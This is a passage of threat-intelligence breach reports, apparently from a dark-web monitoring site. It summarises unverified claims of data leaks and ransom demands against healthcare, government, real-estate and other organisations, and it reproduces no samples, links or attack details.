Hospitalière de France** (French Hospital Federation), which represents public healthcare and medico-social institutions and runs a major job board for the public health sector. The leak reportedly contains **30,728 records** dated June 2026 and is being shared for free. Per the post, each record includes a title (civilité), first and last name, direct phone line, email address, and a membership flag. The dataset's scope is **unverified**. Severity LOW Data30,728 records PriceFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France ActorSaturne ### ▣Post details TargetFHF.fr (Fédération Hospitalière de France) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorHealthcare / Public Sector ClaimDatabase leaked (30,728 records) DataNames, direct phones, emails, membership FreshnessJun 2026 ObservedJun 23, 2026 ActorSaturne ### !Allegedly included - 30,728 records (claimed) - Titles (civilité) - First & last names - Direct phone lines - Email addresses - Membership status - Public health sector contacts - Data dated June 2026 ### ◱Screenshot [ ![FHF France alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/234587923568912587692783598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/234587923568912587692783598723.png) ### ⚠Potential impact Because the exposed data is professional contact information rather than patient or medical records, the per-record sensitivity is relatively low: it consists of titles, names, direct phone lines, email addresses, and a membership flag for contacts associated with the French Hospital Federation and its public-health job board. The notable risk is that this is effectively a curated list of public-health-sector professionals, which makes the email-and-direct-line pairing valuable for targeted phishing, recruitment scams, and social engineering aimed at healthcare institutions, a sector that is itself a frequent target of attacks. No passwords, patient data, home addresses, or financial information are referenced. The scope and authenticity are unconfirmed. ### iStatus Unverified A sample and a download were posted to a forum behind a reply-gate, with the sample rows and the poster's contact handle already redacted in the shared screenshots; the sample records and any contact details are not reproduced here. The actor describes the data as a free leak of the website's database. The claim has **not been independently confirmed** and the FHF has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Argentine Telemedicine Platform Meducar Allegedly Breached, 3.1 Million Patient Records Held to Ransom URL: https://darkwebinformer.com/argentine-telemedicine-platform-meducar-allegedly-breached-3-1-million-patient-records-held-to-ransom/ Last updated: 2026-06-23T15:31:44.000Z Breach Report ![Argentina flag](https://flagcdn.com/w40/ar.png)Argentina Healthcare ## Argentine Telemedicine Platform Meducar Allegedly Breached, 3.1 Million Patient Records Held to Ransom A threat actor using the alias **Kazu** is extorting **Meducar** (meducar.com), a Latin American telemedicine and patient-management platform owned by **Grupo Cormos**, an Argentine health-tech company. The platform provides appointment scheduling, electronic health records, clinical-history management, electronic prescriptions, and telemedicine for doctors and clinics. The actor claims to have stolen the personal data of **3,197,677 users** and is demanding a **$150,000 ransom** with a deadline of **July 9, 2026**, threatening to sell the data publicly if the company does not pay. The exposed fields reportedly include patients' names, emails, gender, date of birth, nationality, marital status, home address, city, phone and WhatsApp numbers, profession, health-insurance (obra social) coverage and member numbers, and **religion**. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data3.1M users Demand$150K ransom Country![Argentina flag](https://flagcdn.com/w40/ar.png)Argentina ActorKazu ### ▣Post details TargetMeducar / Grupo Cormos (meducar.com) Country![Argentina flag](https://flagcdn.com/w40/ar.png)Argentina SectorHealthcare / HealthTech Claim3,197,677 users' PII stolen DataPatient PII + health insurance + religion Demand$150,000 ransom DeadlineJul 9, 2026 ActorKazu ### !Allegedly affected - 3,197,677 user records (claimed) - Full names & emails - Date of birth & gender - Home address & city - Phone, WhatsApp & ref numbers - Health insurance & member numbers - Nationality, marital status, profession - Religion (special-category data) ### ◱Screenshot [ ![Meducar Argentina alleged breach Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/978325421978356927865344987234698719.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/978325421978356927865344987234698719.png) ### ⚠Potential impact This is a critical-tier incident because it targets a telemedicine and patient-management platform, exposing the data of millions of patients. The records reportedly combine full identity data (names, dates of birth, home addresses, contact and WhatsApp numbers) with **health-related information** (health-insurance coverage and member numbers, in the context of a platform holding clinical histories and prescriptions) and **special-category data including religion**. Health data and religion are among the most sensitive and most damaging categories to expose, enabling medical identity theft, insurance fraud, targeted extortion of patients, discrimination, and serious privacy harm, with effects that cannot be undone by changing a password. The double-extortion framing (pay or the data is sold) raises the likelihood of public exposure if the deadline passes. No patient records, sample data, or attacker contact details are reproduced here. Authenticity and scope are unverified. ### iStatus Unverified The actor posted an extortion notice with a ransom demand, a deadline, and links to samples and contact channels; the samples, the attacker's contact details, and any patient data are **not** reproduced here. This is the latest in a series of near-identical healthcare extortion listings by the same actor, including against another Grupo Cormos platform. The claim has **not been independently confirmed** and Meducar / Grupo Cormos has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### European Real Estate CRM Whise Allegedly Breached, Over 40 Million Records Leaked URL: https://darkwebinformer.com/european-real-estate-crm-whise-allegedly-breached-over-40-million-records-leaked/ Last updated: 2026-06-22T18:18:53.000Z Breach Report ![European Union flag](https://flagcdn.com/w40/eu.png)European Union Real Estate ## European Real Estate CRM Whise Allegedly Breached, Over 40 Million Records Leaked A threat actor using the alias **ChimeraZ** has posted what they describe as the **database of Whise.eu**, a European real-estate CRM used by agencies and agents to manage leads, properties, and transactions. The leak is a **\~15.8 GB JSON dataset of about 40.85 million lines**, dominated by roughly **37.7 million email-sending logs** alongside several million contact records (a 2.8M-contact file plus smaller contact files). Per the samples, the email logs include recipient names, email addresses, IP addresses, and timestamps, while the contact records include names, email addresses, phone and mobile numbers, marketing-consent flags, and property search criteria. The .be mailing domain and EU focus indicate the data spans individuals across multiple European countries. The dataset's authenticity and scope are **unverified**. Severity HIGH Data40.8M lines AccessPoints-gated Country![European Union flag](https://flagcdn.com/w40/eu.png)EU ActorChimeraZ ### ▣Post details TargetWhise.eu, real estate CRM Country![European Union flag](https://flagcdn.com/w40/eu.png)European Union SectorReal Estate / SaaS (CRM) ClaimDatabase leaked (15.8 GB JSON) Data40.85M lines (email logs + contacts) Files4 JSON (emails + contacts) ObservedJun 22, 2026 ActorChimeraZ ### !Allegedly included - \~40.85M lines (\~15.8 GB) - \~37.7M email-send logs - \~3M+ contact records - Names & email addresses - Phone & mobile numbers - IP addresses & timestamps - Property search criteria - Marketing-consent flags ### ◱Screenshot [ ![Whise EU alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/798235987625987623958762394586798723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/798235987625987623958762394586798723.png) ### ⚠Potential impact This is a high-severity breach primarily because of its scale: tens of millions of email-activity logs and several million contact records belonging to real-estate leads and clients across Europe. The data reportedly pairs names with email addresses, phone and mobile numbers, IP addresses, and property search criteria such as budget and location preferences. Even without passwords or financial-account data, this combination supports large-scale phishing, real-estate and rental scams tailored to people actively searching for property, spam, and profiling. Because IP addresses and contact details are personal data under EU rules, this would be a significant GDPR-relevant exposure. No contact records, names, emails, phone numbers, IP addresses, or download links are reproduced here. The scope and authenticity are unconfirmed. ### iStatus Unverified Sample JSON records and a download were posted to a forum behind a points paywall; the sample records and download links are not reproduced here. The actor describes the data as a leaked database of the CRM. The claim has **not been independently confirmed** and Whise has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### US Stock-Market Forum Stockaholics Allegedly Breached, Member Database Leaked URL: https://darkwebinformer.com/us-stock-market-forum-stockaholics-allegedly-breached-member-database-leaked/ Last updated: 2026-06-22T17:24:46.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Online Forum ## US Stock-Market Forum Stockaholics Allegedly Breached, Member Database Leaked A threat actor using the alias **TomTom** has posted what they describe as the **member database of Stockaholics.net**, a US-based online forum for stock-market, trading, cryptocurrency, and financial-market discussion. The leak appears to be an export of the forum's user table, reportedly containing **usernames, email addresses, gender, timezone, registration and activity data, and account group, permission, and moderation flags**. No passwords were visible in the sample, and no record count, file size, or price was stated in the post. The dataset's authenticity and scope are **unverified**. Severity LOW DataMember DB AccessNot stated Country![United States flag](https://flagcdn.com/w40/us.png)USA ActorTomTom ### ▣Post details TargetStockaholics.net, finance forum Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorOnline Forum / Finance ClaimMember database leaked DataUsernames, emails, forum account data FormatForum user table export ObservedJun 22, 2026 ActorTomTom ### !Allegedly included - Forum member database (claimed) - Usernames - Email addresses - Gender - Timezone & language - Registration & activity dates - Account & permission groups - Moderation / admin flags ### ◱Screenshot [ ![Stockaholics United States alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/2978365987263598762359876239876523.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/2978365987263598762359876239876523.png) ### ⚠Potential impact Because the exposed data is forum account information rather than financial or identity records, the per-record sensitivity is relatively low: it consists mainly of usernames, email addresses, gender, and forum activity metadata, with no passwords, financial data, home addresses, or dates of birth visible in the sample. The main risk is that the email-and-username pairing, combined with the forum's finance and cryptocurrency focus, makes members attractive targets for tailored phishing, investment and crypto scams, and credential-stuffing attempts against accounts that reuse passwords elsewhere. Affected members would benefit from staying alert to unsolicited finance-themed messages. The scope and authenticity are unconfirmed. ### iStatus Unverified A sample database export was posted to a forum along with a contact handle; the sample records and the poster's contact details are not reproduced here. The actor describes the data as the forum's member database. The claim has **not been independently confirmed** and Stockaholics has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Indian Food Delivery App Deliware Allegedly Breached, Exposing User Data, Tokens, and Stripe Keys URL: https://darkwebinformer.com/indian-food-delivery-app-deliware-allegedly-breached-exposing-user-data-tokens-and-stripe-keys/ Last updated: 2026-06-22T17:01:20.000Z Breach Report ![India flag](https://flagcdn.com/w40/in.png)India Food Delivery ## Indian Food Delivery App Deliware Allegedly Breached, Exposing User Data, Tokens, and Stripe Keys A threat actor using the alias **NightBroker** has posted what they describe as the database of **Deliware** (deliware.app), an Indian food-delivery app serving restaurant owners, delivery drivers, and customers. The actor says the breach exploited an **exposed demo administration panel** and that the data mixes test and real customer, restaurant, and order records. The leak reportedly comprises **six JSON files**, including users.json (1,572 records), restaurants, orders, promo codes, and brands, plus an admin settings file said to contain **Stripe API keys**. The user records reportedly pair personal details (name, phone, email, date of birth, gender, registration address and geolocation) with **authentication tokens, one-time passwords, password-reset keys, and payment references**. The dataset's authenticity and scope are **unverified**. Severity HIGH Data1,572 users AccessPoints-gated Country![India flag](https://flagcdn.com/w40/in.png)India ActorNightBroker ### ▣Post details TargetDeliware (deliware.app), food delivery app Country![India flag](https://flagcdn.com/w40/in.png)India SectorFood Delivery / Tech ClaimDatabase leaked (6 JSON files) Data1,572 users + restaurants/orders + admin secrets VectorExposed demo admin panel ObservedJun 22, 2026 ActorNightBroker ### !Allegedly included - 6 JSON files (users, orders, etc.) - 1,572 user records - Names, phones & emails - Dates of birth & gender - Registration address & geolocation - Auth tokens, OTPs & reset keys - Payment refs (card, Stripe IDs, wallet) - Stripe API keys (admin settings) ### ◱Screenshot [ ![Deliware India alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/237985982736598762359678235987987235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/237985982736598762359678235987987235.png) ### ⚠Potential impact This is a high-severity breach despite its modest size, because it allegedly exposes far more than user PII. The user records reportedly combine personal data (names, phone numbers, emails, dates of birth, and home registration addresses with geolocation) with **account-takeover material**: authentication tokens, one-time passwords, and password-reset keys. Most seriously, the leak is said to include an admin settings file containing **Stripe API keys**, which if live could enable direct payment fraud and unauthorized access to the payment processor, warranting immediate key rotation. Exposed auth tokens and reset keys similarly raise the risk of account hijacking. The actor notes the data mixes test and real records, so the true number of affected real users is unclear. No user records, tokens, secrets, API keys, or download links are reproduced here. The dataset's authenticity and scope are unverified. ### iStatus Unverified Sample records and a download were posted to a forum behind a points paywall; the sample records, tokens, secrets, and download links are **not** reproduced here. If confirmed, the exposure of API keys and authentication tokens would warrant urgent credential rotation. The claim has **not been independently confirmed** and Deliware has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Around 318,000 Student Records, Including Minors and Facial Photos, Allegedly Leaked From France's Région Occitanie URL: https://darkwebinformer.com/around-318-000-student-records-including-minors-and-facial-photos-allegedly-leaked-from-frances-region-occitanie/ Last updated: 2026-06-22T16:44:00.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Government Minors Affected ## Around 318,000 Student Records, Including Minors and Facial Photos, Allegedly Leaked From France's Région Occitanie A threat actor using the alias **xMetah** has posted what they describe as a database from laregion.fr, the official site of France's **Région Occitanie (Pyrénées-Méditerranée)**, one of the country's regional governments. The leak reportedly contains **318,751 records (about 181 MB)** plus a second file said to hold **photos of students' faces**. Per the post, each record includes a student's name, birthdate, home address, phone number, and email, alongside a parent or guardian's name and contact details, school or training-establishment information, and regional card details. Because many of the listed birthdates indicate the individuals are **minors**, this exposure carries heightened child-safety risk. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data318K records AccessPoints-gated Country![France flag](https://flagcdn.com/w40/fr.png)France ActorxMetah ### ▣Post details TargetRégion Occitanie (laregion.fr) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorGovernment / Education Claim318,751 records + student photos DataStudent PII (incl. minors), parent contacts Files2 (records + facial photos) ObservedJun 22, 2026 ActorxMetah ### !Allegedly included - 318,751 records (claimed) - Photos of students' faces - Student names & birthdates - Home addresses - Phone numbers & emails - Parent / guardian contacts - School / training details - Regional card details ### ◱Screenshot [ ![Region Occitanie France alleged student data leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/78293587293657892635978238795225.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/78293587293657892635978238795225.png) ### ⚠Potential impact This is a critical exposure because it allegedly involves the personal data of students, many of whom appear to be **minors** based on the listed birthdates, together with **photos of their faces**. The combination of a child's full name, date of birth, home address, contact details, and a facial photograph is among the most dangerous categories of data to expose: beyond identity theft and fraud, it creates direct safety risks to children, including stalking, targeting, and exploitation. Parent and guardian contact details and school information further increase the potential for targeted social-engineering and scams aimed at families. No student or parent records, names, addresses, photos, or download links are reproduced here. Given the apparent presence of minors' data, prompt notification of the affected institutions and families is especially important. The dataset's authenticity and scope are unverified. ### iStatus Unverified Sample records and a download were posted to a forum behind a points paywall; the sample records, student photos, personal data, and download links are **not** reproduced here. Because the data appears to include minors, this warrants urgent attention from the affected authorities. The claim has **not been independently confirmed** and Région Occitanie has not publicly addressed it. This report concerns the personal data of **minors**. In the interest of child safety, no sample records, student photos, or download links are reproduced or offered here, redacted or otherwise. For context on other incidents, see the [threat feed](https://darkwebinformer.com/threat-feed/). [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Over 100,000 Records Allegedly Exposed in Multiple Magelang City Government Leaks URL: https://darkwebinformer.com/over-100-000-records-allegedly-exposed-in-multiple-magelang-city-government-leaks/ Last updated: 2026-06-22T16:31:34.000Z Breach Report ![Indonesia flag](https://flagcdn.com/w40/id.png)Indonesia Government ## Over 100,000 Records Allegedly Exposed in Multiple Magelang City Government Leaks A forum user posting under the alias **ctyzn**, identifying as a concerned citizen, claims to have documented multiple recent government data exposures affecting **Magelang City, Indonesia**. According to the post, **four separate incidents between May and June 2026 exposed over 100,000 records** containing personal, medical, and employment details, including Indonesian national identity numbers (**NIK**). The poster argues that affected residents were not notified, and criticizes the authorities for taking down affected pages while copies remain archived elsewhere. The post also points to a third-party web tool for residents to check whether their identity numbers appear in the exposed datasets. The number and scope of the exposures are **unverified**. Severity HIGH Data100K+ records Incidents4 reported Country![Indonesia flag](https://flagcdn.com/w40/id.png)Indonesia Posterctyzn ### ▣Post details TargetMagelang City government (multiple agencies) Country![Indonesia flag](https://flagcdn.com/w40/id.png)Indonesia SectorGovernment / Public Sector Claim4 exposures, 100K+ records (May-Jun 2026) DataPersonal, medical, employment, NIK TypePublic-awareness disclosure (not for sale) ObservedJun 22, 2026 Posterctyzn (claims citizen/researcher) ### !Allegedly affected - 100,000+ records (claimed) - 4 incidents (May-Jun 2026) - National ID numbers (NIK) - Personal details - Medical information - Employment details - Multiple city agencies - Residents reportedly unnotified ### ◱Screenshot [ ![Magelang City Indonesia alleged data exposure Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/5462358792375862359876987235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/5462358792375862359876987235.png) ### ⚠Potential impact This is a high-severity exposure because it allegedly combines Indonesian national identity numbers (NIK) with personal, medical, and employment data for over 100,000 residents, sourced from government systems. The NIK is a primary national identifier used across banking, government, and verification services, so its exposure alongside medical and employment records creates strong potential for identity theft, financial fraud, and targeted scams. The reported lack of breach notification means many affected residents may be unaware and unable to take protective steps, and because copies of exposed pages persist in web archives, removing the original pages does not contain the data. No national ID numbers, personal records, or links to the exposed data or lookup tool are reproduced here. The number of incidents and total scope are unverified. ### iStatus Unverified The post aggregates several claimed government data exposures and references archived copies and a third-party lookup tool; national ID numbers, personal records, and those links are **not** reproduced here. The poster frames the disclosure as awareness rather than a sale or leak. The claims have **not been independently confirmed**, and Magelang City authorities have not publicly addressed them in this post. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Argentine Telemedicine Platform ConsultorioMovil Allegedly Breached, 1.73 TB Held to Ransom URL: https://darkwebinformer.com/argentine-telemedicine-platform-consultoriomovil-allegedly-breached-1-73-tb-held-to-ransom/ Last updated: 2026-06-22T16:17:58.000Z Breach Report ![Argentina flag](https://flagcdn.com/w40/ar.png)Argentina Healthcare ## Argentine Telemedicine Platform ConsultorioMovil Allegedly Breached, 1.73 TB Held to Ransom A threat actor using the alias **Kazu** is extorting **ConsultorioMovil** (consultoriomovil.net), a telemedicine and healthcare platform owned by **Grupo Cormos (Cormos S.A.)**, an Argentine health-tech company. The platform provides appointment scheduling, electronic medical records, and online video and messaging telemedicine consultations for doctors, clinics, and medical professionals. The actor claims to have stolen a **\~1.73 TB dataset of more than 2 million files** and is demanding a **$200,000 ransom** with a deadline of **July 7, 2026**, threatening to sell the data publicly if the company does not pay. Because the platform handles clinical documentation and patient communications, the dataset would be expected to contain highly sensitive patient health information. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data1.73 TB Demand$200K ransom Country![Argentina flag](https://flagcdn.com/w40/ar.png)Argentina ActorKazu ### ▣Post details TargetConsultorioMovil / Grupo Cormos (consultoriomovil.net) Country![Argentina flag](https://flagcdn.com/w40/ar.png)Argentina SectorHealthcare / HealthTech Claim1.73 TB / 2M+ files stolen DataTelemedicine & EMR data Demand$200,000 ransom DeadlineJul 7, 2026 ActorKazu ### !Allegedly affected - 2,000,000+ files (claimed) - 1.73 TB total size - Electronic medical records - Clinical documentation - Appointment scheduling data - Telemedicine consultations - Patient communications - Practice administration data ### ◱Screenshot [ ![ConsultorioMovil Argentina alleged breach Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9235789239875692856987123649876235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9235789239875692856987123649876235.png) ### ⚠Potential impact This is a critical-tier incident because it targets a telemedicine and EMR platform, meaning the stolen data would be expected to include **protected health information**: patient identities, clinical records and diagnoses, prescriptions, appointment and telemedicine histories, and doctor-patient communications. Health data is among the most sensitive and most damaging categories to expose, enabling medical identity theft, insurance fraud, targeted extortion of patients, and serious privacy harm, with effects that cannot be undone by changing a password. The double-extortion framing (pay or the data is sold) also raises the likelihood of public exposure if the deadline passes. No patient records, sample data, or attacker contact details are reproduced here. Authenticity and scope are unverified. ### iStatus Unverified The actor posted an extortion notice with a ransom demand, a deadline, and links to samples and contact channels; the samples, the attacker's contact details, and any patient data are **not** reproduced here. This follows a near-identical listing by the same actor against another regional healthcare platform. The claim has **not been independently confirmed** and ConsultorioMovil / Grupo Cormos has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Colombian Healthcare Platform SaludTools Allegedly Breached, 2.3 TB of Records Held to Ransom URL: https://darkwebinformer.com/colombian-healthcare-platform-saludtools-allegedly-breached-2-3-tb-of-records-held-to-ransom/ Last updated: 2026-06-22T16:07:45.000Z Breach Report ![Colombia flag](https://flagcdn.com/w40/co.png)Colombia Healthcare ## Colombian Healthcare Platform SaludTools Allegedly Breached, 2.3 TB of Records Held to Ransom A threat actor using the alias **Kazu** is extorting **SaludTools** (saludtools.com), a Colombian health-tech company that provides a cloud-based practice-management and electronic medical record (EMR/EHR) platform for physicians, clinics, and healthcare professionals. The actor claims to have stolen a **\~2.3 TB dataset of roughly 4.6 million files** and is demanding a **$400,000 ransom** with a deadline of **July 7, 2026**, threatening to sell the data publicly if the company does not pay. Because the platform handles clinical documentation, appointments, telemedicine, billing, and regulatory reporting, the dataset would be expected to contain highly sensitive patient health information. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data2.3 TB Demand$400K ransom Country![Colombia flag](https://flagcdn.com/w40/co.png)Colombia ActorKazu ### ▣Post details TargetSaludTools (saludtools.com), EMR/EHR platform Country![Colombia flag](https://flagcdn.com/w40/co.png)Colombia SectorHealthcare / HealthTech Claim2.3 TB / \~4.6M files stolen DataEMR/EHR & practice-management data Demand$400,000 ransom DeadlineJul 7, 2026 ActorKazu ### !Allegedly affected - \~4,599,294 files (claimed) - 2.3 TB total size - Electronic medical records (EMR/EHR) - Clinical documentation - Appointments & telemedicine data - Billing & insurance records - Regulatory reporting data - Patient engagement data ### ◱Screenshot [ ![SaludTools Colombia alleged breach Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/235789623798649876231498761981.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/235789623798649876231498761981.png) ### ⚠Potential impact This is a critical-tier incident because it targets a healthcare EMR/EHR platform, meaning the stolen data would be expected to include **protected health information**: patient identities, clinical records and diagnoses, appointment and telemedicine histories, and billing and insurance details. Health data is among the most sensitive and most damaging categories to expose, enabling medical identity theft, insurance fraud, targeted extortion of patients, and serious privacy harm, with effects that cannot be undone by changing a password. The double-extortion framing (pay or the data is sold) also raises the likelihood of public exposure if the deadline passes. No patient records, sample data, or attacker contact details are reproduced here. Authenticity and scope are unverified. ### iStatus Unverified The actor posted an extortion notice with a ransom demand, a deadline, and links to samples and contact channels; the samples, the attacker's contact details, and any patient data are **not** reproduced here. The claim has **not been independently confirmed** and SaludTools has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Website Uptime URL: https://darkwebinformer.com/website-uptime/ Last updated: 2026-07-18T01:45:22.000Z ✓ All systems operational There are currently no known issues affecting any monitored services. \> live status\_ ## Service status Real-time availability for threat-intelligence feeds, APIs, and platform. updated — // status updates automatically every minute · uptime over the last 30 days ### New Darknet Markets URL: https://darkwebinformer.com/new-darknet-markets/ Last updated: 2026-08-27T22:50:28.000Z _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Around 16,800 Records Allegedly Leaked From French Real Estate Professional Platform Ouestfrance-Immo URL: https://darkwebinformer.com/around-16-800-records-allegedly-leaked-from-french-real-estate-professional-platform-ouestfrance-immo/ Last updated: 2026-06-19T16:46:14.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Real Estate ## Around 16,800 Records Allegedly Leaked From French Real Estate Professional Platform Ouestfrance-Immo A threat actor using the alias **ChimeraZ** has posted what they describe as the **database of Ouestfrance-Immo.pro** (ouestfrance-immo.com), a French digital platform built for real-estate professionals and property marketing services. The leak is a **\~76 MB JSON dataset of about 16,855 records covering roughly 12,648 agencies**. The sampled rows consist mainly of agency business information: company and trade names, commercial email addresses, business phone and fax numbers, postal addresses and geolocation, registration identifiers, public profile (vitrine) configuration, opening hours, and listing photo URLs. The dataset's scope is **unverified**. Severity LOW Data16.8K records PriceFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetOuestfrance-Immo.pro, real estate platform Country![France flag](https://flagcdn.com/w40/fr.png)France SectorReal Estate / SaaS ClaimDatabase leaked (76 MB JSON) Data\~16.8K records, \~12,648 agencies ObservedJun 19, 2026 PriceFree leak (reply-gated) ActorChimeraZ ### !Allegedly included - \~16,855 records (claimed) - \~12,648 agencies - 76 MB JSON dataset - Agency & trade names - Commercial email addresses - Business phone & fax numbers - Addresses & geolocation - Profile config & photo URLs ### ◱Screenshot [ ![Ouestfrance-Immo France alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/2973856927368498723659872635987623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/2973856927368498723659872635987623.png) ### ⚠Potential impact Because the sampled data is predominantly **B2B agency directory and marketing-profile information** (company names, commercial email addresses, business phone and fax numbers, addresses, and public profile configuration) that is largely published on the platform's public-facing agency pages, the per-record sensitivity is low. The dataset's value comes from being aggregated and structured, which can aid bulk spam, cold outreach, lead harvesting, or competitor analysis, rather than from any private consumer data. No dates of birth, government-ID numbers, passwords, or financial-account data are referenced, and the contact details are professional rather than personal. The scope and authenticity are unconfirmed. ### iStatus Unverified Sample JSON rows and download links were posted to an underground forum behind a reply-gate (“hidden content”); the sample records and download links are not reproduced here. The actor describes the data as a leaked database of the platform. The claim has **not been independently confirmed** and Ouestfrance-Immo has not publicly addressed it. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB 